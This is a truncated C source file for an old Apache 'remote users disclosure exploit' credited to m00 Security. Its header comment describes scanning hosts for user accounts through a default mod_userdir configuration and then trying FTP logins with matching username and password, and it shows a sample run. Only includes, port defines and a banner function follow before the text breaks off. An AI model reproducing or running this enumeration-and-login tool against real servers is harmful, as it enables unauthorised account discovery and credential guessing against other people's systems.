/* m00-apache-w00t.c
*
* Apache 1.3.*-2.0.48 remote users disclosure exploit by m00 Security.
* ~ Proof-of-Concept edition ~
*
* This tool scans remote hosts with httpd (apache) and disclosure
information
* about existens users accounts via wrong default configuration of
mod_userdir
* (default apache module). Then attempts to log on ftp with found logins.
*
* Works only against Linux and *BSD boxes.
* Info: http://archives.neohapsis.com/archives/vuln-dev/2000-q3/0065.html
* This is old, but curentlly still actual problem, because 99% of all
admins use
* default configuration of apache http server.
*
* This tool scans remote hosts with httpd (apache) and disclosure
information
* about existens users accounts via wrong default configuration of
mod_userdir
* (default apache module). Then attempts to log on ftp with found logins.
*
* -d4rkgr3y
*
* sh-2.05b$ ./m00-apache-w00t -t localhost -u test_userlist.txt -b
*
* [*] Apache 1.3.*-2.0.48 remote users disclosure exploit by m00
Security.
*
* [*] Checking http server [localhost:80]...
* Apache => yes
* Vulnerable => yes
* OS => Mandrake Linux
* [*] Searching for system accounts...
* sergey =>
* m00 =>
* satan => yes
* evil =>
* poison =>
* god =>
* guest =>
* dima =>
* ftp => yes
* vasya =>
* rst =>
* vasi =>
* [*] Searching complete.
* 12 users checked
* 2 users found
* [*] Attempting to log on ftp with login:login...
* satan:satan => no
* ftp:ftp => no
* [*] Complete.
* 0 ftp accounts found
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#define DEFAULT_HTTP_PORT 80
#define DEFAULT_FTP_PORT 21
int m00() {
printf("\n[*] Apache 1.3.*-2.0.48 remote users disclosure exploit by
m00 Security.\n\n");
securitydot.net - 2003-12-06
|
